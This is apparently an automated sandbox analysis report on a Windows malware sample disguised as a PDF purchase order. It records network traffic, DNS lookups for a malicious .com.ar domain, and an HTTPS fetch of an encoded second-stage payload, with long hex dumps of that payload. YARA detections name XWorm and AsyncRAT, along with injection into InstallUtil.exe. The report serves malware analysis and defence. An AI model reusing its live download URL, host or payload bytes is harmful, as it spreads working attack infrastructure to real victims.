                                        Nov 21, 2024 08:58:08.608824968 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.608840942 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.608992100 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.668523073 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.668549061 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.668606043 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.668620110 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.668643951 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.668665886 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.733381987 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.733405113 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.733460903 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.733474016 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.733489037 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.733519077 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.740242004 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.740263939 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.740360022 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.740370035 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.740384102 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.740583897 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.746298075 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.746320963 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.746388912 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.746397972 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.746436119 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.753164053 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.753187895 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.753237009 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.753243923 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.753293991 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.759896994 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.759917974 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.759984016 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.759990931 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.760025978 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.760045052 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.766277075 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.766295910 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.766372919 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.766381025 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.766422987 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.809994936 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.810024023 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.810092926 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.810106993 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.810137987 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.810148001 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.869633913 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.869652987 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.869724035 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.869738102 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.869771004 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.869810104 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.934936047 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.935045004 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.935086966 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.935101986 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.935134888 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.935156107 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.941848993 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.941891909 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.941931963 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.941939116 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.941975117 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.941984892 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.947818041 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.947860003 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.947901964 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.947907925 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.947959900 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.947973013 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.954482079 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.954503059 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.954567909 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.954576015 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.954626083 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.955426931 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.955521107 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.955527067 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.955574036 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.955621004 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.956604004 CET49714443192.168.2.6167.250.5.91

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 08:57:59.513173103 CET5406653192.168.2.61.1.1.1
                                        Nov 21, 2024 08:58:00.057487965 CET53540661.1.1.1192.168.2.6
                                        Nov 21, 2024 08:58:04.395227909 CET4950753192.168.2.61.1.1.1
                                        Nov 21, 2024 08:58:04.793018103 CET53495071.1.1.1192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 21, 2024 08:57:59.513173103 CET192.168.2.61.1.1.10x646bStandard query (0)sierrassinfinusadas.com.arA (IP address)IN (0x0001)false
                                        Nov 21, 2024 08:58:04.395227909 CET192.168.2.61.1.1.10xbbf1Standard query (0)sierrassinfinusadas.com.arA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 21, 2024 08:58:00.057487965 CET1.1.1.1192.168.2.60x646bServer failure (2)sierrassinfinusadas.com.arnonenoneA (IP address)IN (0x0001)false
                                        Nov 21, 2024 08:58:04.793018103 CET1.1.1.1192.168.2.60xbbf1No error (0)sierrassinfinusadas.com.ar167.250.5.91A (IP address)IN (0x0001)false
                                        Nov 21, 2024 08:58:34.280244112 CET1.1.1.1192.168.2.60x3228No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Nov 21, 2024 08:58:34.280244112 CET1.1.1.1192.168.2.60x3228No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                        Nov 21, 2024 08:58:34.280244112 CET1.1.1.1192.168.2.60x3228No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • sierrassinfinusadas.com.ar

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649714167.250.5.914432104C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe
                                        TimestampBytes transferredDirectionData
                                        2024-11-21 07:58:06 UTC96OUTGET /rindasq/Karjsfww.vdf HTTP/1.1
                                        Host: sierrassinfinusadas.com.ar
                                        Connection: Keep-Alive
                                        2024-11-21 07:58:07 UTC182INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 21 Nov 2024 07:58:06 GMT
                                        Content-Length: 935936
                                        Connection: close
                                        Last-Modified: Wed, 20 Nov 2024 22:54:34 GMT
                                        Accept-Ranges: bytes
                                        2024-11-21 07:58:07 UTC16202INData Raw: 7e 68 a6 33 31 36 33 32 32 33 32 36 cc cd 36 33 8a 36 33 32 36 33 32 36 73 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 33 32 36 b3 32 36 33 3c 29 89 3c 36 87 3b fb 12 8a 37 7f ff 17 67 5a 5f 40 12 46 41 5d 51 41 53 5b 13 51 57 5d 5c 59 47 12 54 56 12 44 46 5c 16 5a 5c 16 77 7d 65 13 5f 59 57 57 18 3e 3f 3c 17 32 36 33 32 36 33 32 66 76 32 36 7f 33 35 33 9f b7 1c 88 36 33 32 36 33 32 36 33 d2 36 3d 13 3d 32 02 36 33 72 38 33 32 30 33 32 36 33 32 36 ad 6c 38 33 32 16 33 32 36 53 3c 36 33 32 76 33 32 16 33 32 36 31 32 36 37 32 36 33 32 36 33 32 32 33 32 36 33 32 36 33 32 96 3d 32 36 31 32 36 33 32 36 33 31 36 73 b7 36 33 22 36 33 22 36 33 32 36 23 32 36 23 32 36 33 32 36 33 3d 36 33 32 36 33 32 36 33 32 36
                                        Data Ascii: ~h316322326636326326s26326326326326326326326326326326326263<)<6;7gZ_@FA]QAS[QW]\YGTVDF\Z\w}e_YWW>?<2632632fv26353632632636==263r8320326326l832326S<632v3232612672632632232632632=26126326316s63"63"6326#26#263263=6326326326
                                        2024-11-21 07:58:07 UTC16384INData Raw: 8e a7 b1 57 4d 6b 34 33 36 4d 57 30 36 37 53 1e a1 30 36 35 12 ca 53 90 2c 13 df a5 f0 5a 57 4d 6b 34 33 36 4d 28 30 36 37 53 1e f1 30 36 35 5d 06 33 32 3c 13 20 36 33 32 0e 0c cf c9 cc 4c 18 32 32 32 13 2c d3 2b 61 53 13 fb 62 e4 e3 57 4d 6b 34 33 36 4d 57 30 36 37 53 1e a1 30 36 35 12 57 61 9d 30 13 86 84 37 1e 57 4d 6b 34 33 36 4d 75 30 36 37 53 1e a1 30 36 35 5d 06 33 32 3c 13 30 36 33 32 0e c7 ce c9 cc 41 67 33 32 3c b3 1f 37 33 36 16 39 32 36 33 0a d6 cf cd c9 1b ae 34 33 34 16 34 32 36 33 0a e7 cf cd c9 4d 1c 37 33 36 16 3d 5a 15 2b 12 34 33 32 36 51 12 36 32 a2 01 52 4c 6f 31 32 32 48 50 34 33 36 57 1b a0 34 33 34 16 95 dd 79 c2 12 3c 88 ce de 52 4c 6f 31 32 32 48 39 34 33 36 57 1b a0 34 33 34 59 03 32 36 39 12 3f 33 32 36 0b b3 ca cc cd 48 1d 33
                                        Data Ascii: WMk436MW067S065S,ZWMk436M(067S065]32< 632L222,+aSbWMk436MW067S065Wa07WMk436Mu067S065]32<0632Ag32<73692634344263M736=Z+4326Q62RLo122HP436W434y<RLo122H9436W434Y269?326H3
                                        2024-11-21 07:58:07 UTC16384INData Raw: 33 f3 66 33 32 a2 12 32 36 4a 77 36 33 47 3a 33 32 cd 18 32 36 87 61 36 33 75 7d 33 32 31 3a 32 36 82 3e 36 33 2f 17 33 32 ff 3a 32 36 cd 60 36 33 dd 12 33 32 3c 24 32 36 c1 2e 36 33 8c 17 33 32 61 19 32 36 c9 00 36 33 fe 76 33 32 26 16 32 36 8e 24 36 33 91 7f 33 32 f4 2b 32 36 fa 2f 36 33 05 21 33 32 85 2b 32 36 ae 00 36 33 7b 7b 33 32 c6 72 32 36 dd 07 36 33 20 76 33 32 0b 0d 32 36 72 32 36 33 a7 12 33 32 b3 63 32 36 85 18 36 33 c8 62 33 32 71 73 32 36 6b 01 36 33 42 3e 33 32 7c 31 32 36 d6 0f 36 33 9f 73 33 32 17 7c 32 36 8e 26 36 33 d1 67 33 32 52 64 32 36 3d 11 36 33 b3 74 33 32 24 05 32 36 ab 22 36 33 48 04 33 32 6e 06 32 36 dd 12 36 33 21 72 33 32 9a 0d 32 36 c0 76 36 33 1a 34 33 32 da 61 32 36 2b 0c 36 33 9f 1d 33 32 ea 31 32 36 2c 3f 36 33 7b 6f
                                        Data Ascii: 3f3226Jw63G:3226a63u}321:26>63/32:26`6332<$26.6332a2663v32&26$6332+26/63!32+2663{{32r2663 v3226r26332c2663b32qs26k63B>32|12663s32|26&63g32Rd26=63t32$26"63H32n2663!r3226v63432a26+6332126,?63{o
                                        2024-11-21 07:58:07 UTC16384INData Raw: 12 35 33 32 36 13 97 36 33 32 16 62 32 36 33 6b aa 13 46 34 33 32 0e 3e 8c c9 cc 23 08 24 6a 25 0d 12 2b 31 32 36 1b 4e 35 33 34 0f cb 8f c9 cc 14 16 51 33 36 33 0a db 8e cd c9 cd 3e 3c 33 12 34 33 32 36 13 25 36 33 32 16 3b 32 36 33 6b aa 13 1a 34 33 32 1e 48 31 36 35 08 ff 8e cd c9 15 12 95 33 32 36 0b 8c 8b cc cd 16 7b 32 36 33 12 14 33 32 36 6b cc 38 0e 32 16 7c 33 36 33 0a 93 8e cd c9 2c 2c 25 21 12 be 33 32 36 1b 49 35 33 34 0f a1 8f c9 cc 14 16 4c 33 36 33 0a b1 8e cd c9 21 6d d6 40 1b 36 33 38 20 4d 15 36 33 38 1e 16 31 36 35 12 1b 32 32 36 0b 58 8b cc cd 27 28 4c 11 33 32 3c 1b 56 35 33 34 0f fc c8 c9 cc 12 a6 33 32 36 1b 49 35 33 34 0f 79 8f c9 cc 14 16 97 32 36 33 0a 09 8e cd c9 22 5b 28 2c 5e aa 13 33 34 33 32 0e 1c 8f c9 cc cc 3a 74 32 16 23
                                        Data Ascii: 5326632b263kF432>#$j%+126N534Q363><34326%632;263k432H165326{263326k82|363,,%!326I534L363!m@638 M638165226X'(L32<V534326I534y263"[(,^3432:t2#
                                        2024-11-21 07:58:07 UTC16384INData Raw: 16 30 32 36 33 cc 3a 2f 32 aa 13 5c 37 33 32 1e d7 31 36 35 0b 2c c4 cd c9 15 12 76 33 32 36 0b 3d c1 cc cd c8 3f 2a 36 13 33 36 33 32 c8 3f 2e 36 af 12 8c 33 32 36 1b d6 35 33 34 0f c1 c4 c9 cc 14 16 38 32 36 33 0a d1 c5 cd c9 cd 3e 33 33 12 35 33 32 36 cd 3e 2f 33 ae 16 77 32 36 33 1a d2 30 32 30 09 f8 c0 cc cd 10 13 ec 36 33 32 0e 8c c4 c9 cc cc 3a 2b 32 16 2e 32 36 33 cc 3a 2f 32 aa 13 3b 36 33 32 1e d7 31 36 35 08 94 c5 cd c9 15 12 4a 33 32 36 0b a5 c0 cc cd c8 3f 2a 36 13 27 36 33 32 c8 3f 2e 36 af 12 c6 33 32 36 0b 4d c0 cc cd c8 3f 2a 36 13 38 36 33 32 16 a5 32 36 33 12 2c 33 32 36 6b ae 16 e7 32 36 33 0a 56 c5 cd c9 cd 3e 2e 33 12 21 33 32 36 cd 3e 2a 33 ae 16 04 32 36 33 1a d2 30 32 30 0a 71 c0 cc cd 10 13 25 36 33 32 0e 0b c4 c9 cc cc 3a 2b 32
                                        Data Ascii: 0263:/2\732165,v326=?*63632?.63265348263>335326>/3w263020632:+2.263:/2;632165J326?*6'632?.6326M?*68632263,326k263V>.3!326>*3263020q%632:+2
                                        2024-11-21 07:58:07 UTC16384INData Raw: 33 32 24 33 32 22 19 32 36 33 20 36 33 26 1c 33 32 36 21 32 36 27 18 36 33 32 24 33 32 22 19 32 36 33 20 36 33 26 1c 33 32 36 21 32 36 27 18 36 33 32 24 33 32 22 19 32 36 33 20 36 33 26 1c 33 32 36 21 32 36 27 18 36 33 32 24 33 32 22 19 32 36 33 21 06 30 32 32 33 32 36 33 32 36 33 32 36 33 18 25 03 36 36 37 32 36 33 32 36 33 32 36 33 32 1c 20 02 35 33 36 36 33 32 36 33 32 36 33 32 36 19 21 06 30 32 32 33 32 36 33 32 36 33 32 36 33 18 24 33 32 22 19 32 36 33 21 06 30 32 32 33 32 36 33 32 36 33 32 36 33 18 25 03 31 36 37 32 36 33 32 36 33 32 36 33 32 1c 20 02 35 33 36 36 33 32 36 33 32 36 33 32 36 19 21 06 30 32 32 33 32 36 33 32 36 33 32 36 24 18 24 33 32 21 19 32 36 33 21 06 30 32 32 33 32 36 33 32 36 33 32 36 27 18 25 03 36 36 37 32 36 33 32 36 33 32 36
                                        Data Ascii: 32$32"263 63&326!26'632$32"263 63&326!26'632$32"263 63&326!26'632$32"263!0223263263263%6672632632632 5366326326326!0223263263263$32"263!0223263263263%1672632632632 5366326326326!022326326326$$32!263!022326326326'%66726326326
                                        2024-11-21 07:58:07 UTC16384INData Raw: 37 1e 68 02 3b 05 3c 36 5c 3a 3f 33 34 1c 71 1a fe 31 32 30 e3 03 37 33 30 1e 8c 30 36 35 18 36 33 32 70 18 37 1e 09 32 62 62 3c 37 3d 32 59 3f 3b 36 35 18 36 33 70 1e fb 30 36 35 e2 04 32 32 34 1b 8d 34 33 34 1c 33 32 36 0d 19 33 1b 16 97 32 60 38 33 5d 26 3a 32 30 19 70 1e fb 30 36 35 e2 05 32 32 34 1b 8d 34 33 34 1c 33 32 36 65 19 33 1b bf db 54 72 38 30 3c 36 3d 33 38 31 5d 22 3a 32 30 19 32 36 71 1a fe 31 32 30 e3 06 37 33 30 1e 8c 30 36 35 18 36 33 32 08 18 37 1e 9a a5 2b 09 3c 36 5c 2a 3f 33 34 1c 71 1a fe 31 32 30 e3 07 37 33 30 1e 8c 30 36 35 18 36 33 32 08 18 37 1e b3 66 63 03 3c 36 5c 2e 3f 33 34 1c 71 1a fe 31 32 30 e3 04 37 33 30 1e 8c 30 36 35 18 36 33 32 08 18 37 1e 20 e8 7a 01 3c 36 5c 12 3f 33 34 1c 71 1a fe 31 32 30 e3 05 37 33 30 1e 8c
                                        Data Ascii: 7h;<6\:?34q120730065632p72bb<7=2Y?;6563p06522443432632`83]&:20p065224434326e3Tr80<6=381]":2026q1207300656327+<6\*?34q1207300656327fc<6\.?34q1207300656327 z<6\?34q120730
                                        2024-11-21 07:58:07 UTC16384INData Raw: 39 33 34 1c 33 32 74 1b fa 34 33 34 e6 f8 30 36 31 1a 89 31 32 30 19 32 36 33 7c 1d 36 1a 9c ff 70 7c 3d 30 38 33 3c 37 5c 46 39 33 34 1c 71 1a fe 31 32 30 e3 fe 34 33 30 1e 8c 30 36 35 18 36 33 32 70 18 37 1e 83 e7 12 6f 3c 37 3d 32 59 4b 3d 36 35 18 36 33 70 1e fb 30 36 35 e2 fb 31 32 34 1b 8d 34 33 34 1c 33 32 36 75 19 33 1b 48 eb 1c 5a 38 32 3c 36 5c 4e 39 33 34 1c 33 32 74 1b fa 34 33 34 e6 fd 30 36 31 1a 89 31 32 30 19 32 36 33 74 1d 36 1a 1e ca 4b 7c 3d 33 38 33 5d b6 3c 32 30 19 32 36 71 1a fe 31 32 30 e3 fd 34 33 30 1e 8c 30 36 35 18 36 33 32 70 18 37 1e 7d 06 6f 1c 3c 37 3d 32 59 b7 3d 36 35 18 36 33 70 1e fb 30 36 35 e2 e6 31 32 34 1b 8d 34 33 34 1c 33 32 36 75 19 33 1b 35 97 71 6e 38 32 3c 36 5c ba 39 33 34 1c 33 32 74 1b fa 34 33 34 e6 e2 30
                                        Data Ascii: 93432t434061120263|6p|=083<7\F934q120430065632p7o<7=2YK=6563p065124434326u3HZ82<6\N93432t434061120263t6K|=383]<2026q120430065632p7}o<7=2Y=6563p065124434326u35qn82<6\93432t4340
                                        2024-11-21 07:58:07 UTC16384INData Raw: b2 f9 d4 1a 21 36 92 f9 ce 1a 21 36 86 f9 3a 19 21 36 f3 f9 12 19 21 36 f8 f9 07 19 21 36 e5 f9 73 19 21 36 d2 f9 65 19 21 36 df f9 57 19 21 36 c4 f9 59 19 21 36 31 fe b1 19 21 36 3e fe ab 19 21 36 19 fe 85 19 21 36 06 fe ff 19 21 36 73 fe e9 19 21 36 78 fe d9 19 21 36 65 fe cb 19 21 36 52 fe 3b 18 21 36 5f fe 2d 18 21 36 44 fe 07 18 21 36 be fe 71 18 21 36 ae fe 53 18 21 36 9b fe 44 18 21 36 80 fe ba 18 21 36 8d fe af 18 21 36 fa fe 99 18 21 36 e7 fe f5 18 21 36 ec fe ef 18 21 36 d9 fe db 18 21 36 c6 fe 31 1f 21 36 33 ff 25 1f 21 36 38 ff 29 1f 21 36 25 ff 1a 1f 21 36 12 ff 74 1f 21 36 1f ff 67 1f 21 36 04 ff 68 1f 21 36 71 ff 5d 1f 21 36 7e ff 4e 1f 21 36 6b ff a2 1f 21 36 50 ff 90 1f 21 36 5d ff 85 1f 21 36 4a ff f1 1f 21 36 aa ff eb 1f 21 36 97 ff dd
                                        Data Ascii: !6!6:!6!6!6s!6e!6W!6Y!61!6>!6!6!6s!6x!6e!6R;!6_-!6D!6q!6S!6D!6!6!6!6!6!6!61!63%!68)!6%!6t!6g!6h!6q]!6~N!6k!6P!6]!6J!6!6
                                        2024-11-21 07:58:07 UTC16384INData Raw: b0 37 cf 31 1a 67 33 36 3b 32 a7 2b ac 76 b1 33 ca 30 66 62 32 32 3e 33 a1 36 e7 a0 a9 27 ce 35 5b 66 37 33 3a 36 a0 32 de a1 37 2f cf 31 b6 67 33 36 3b 32 a5 33 ce a4 3d 23 ca 30 a6 62 32 32 3e 33 a1 36 23 a1 84 2b ce 35 9f 66 37 33 3a 36 a0 32 12 a0 0f 22 cf 31 f6 67 33 36 3b 32 a5 33 0a a5 8b 2a ca 30 ea 62 32 32 3e 33 a1 36 7f a1 38 22 cf 35 df 66 37 33 3a 36 a0 32 56 a0 23 2f ce 31 32 66 33 36 3b 32 a5 33 46 a5 8a 33 cb 30 2a 63 32 32 3e 33 a1 36 bb a1 38 22 cf 35 1f 67 37 33 3a 36 a0 32 aa a0 8b 37 ce 31 76 66 33 36 3b 32 a5 33 82 a5 48 29 cb 30 6a 63 32 32 3e 33 a1 36 f7 a1 38 22 cc 35 5f 67 37 33 3a 36 a0 32 ee a0 b8 37 cd 31 4a 66 33 36 3b 32 a5 33 de a5 c6 3d c8 30 ba 63 32 32 3e 33 a3 36 33 a6 b7 28 cc 35 ab 67 37 33 3a 36 a2 32 2c a7 bc 2d 33
                                        Data Ascii: 71g36;2+v30fb22>36'5[f73:627/1g36;23=#0b22>36#+5f73:62"1g36;23*0b22>368"5f73:62V#/12f36;23F30*c22>368"5g73:6271vf36;23H)0jc22>368"5_g73:6271Jf36;23=0c22>363(5g73:62,-3


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:57:58
                                        Start date:21/11/2024
                                        Path:C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\PO#8329837372938383839238PDF.exe"
                                        Imagebase:0xfe0000
                                        File size:181'760 bytes
                                        MD5 hash:BA88DCA6E9D0A6F55A8ADDC30B02D988
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2261337543.00000000074D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2256839554.0000000004381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2237773509.0000000003752000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:02:58:08
                                        Start date:21/11/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x360000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3396289534.0000000000732000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:7
                                        Start time:02:58:13
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 904
                                        Imagebase:0x180000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 0332EA60 Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: U$o&vMnf
                                          • API String ID: 0-2643213304
                                          • Opcode ID: 240f0afceb0c33951e0b3cdbeb1c7bdb1c517e10af9b8a8e084e0bf2cc9ec482
                                          • Instruction ID: 6032cc92baf9b49e4d7fede2502d0c4a2d0440d15a61f6b8ac02dece6cce2e5a
                                          • Opcode Fuzzy Hash: 240f0afceb0c33951e0b3cdbeb1c7bdb1c517e10af9b8a8e084e0bf2cc9ec482
                                          • Instruction Fuzzy Hash: 47A29475A00628CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40
                                          Function 07E5EE20 Relevance: .3, Instructions: 276COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0594f07a87ab44b68a8a1ce21d6e59ac93bffa9d8f4a5373c24c7ce04c702aee
                                          • Instruction ID: 0881254354ba8d478fd010915c84cceb0bfe19e286a7a1c9be231a92197e3451
                                          • Opcode Fuzzy Hash: 0594f07a87ab44b68a8a1ce21d6e59ac93bffa9d8f4a5373c24c7ce04c702aee
                                          • Instruction Fuzzy Hash: 3AD1C274E01219CFDB54DFA9D890A9DBBB2FF89300F1091A9D809AB365DB35AD81CF50
                                          Function 03321D40 Relevance: .2, Instructions: 180COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16a2dbc01026df1bfb4b2888fadd3cc78cf11b0c0699dd5e41634869927f9f40
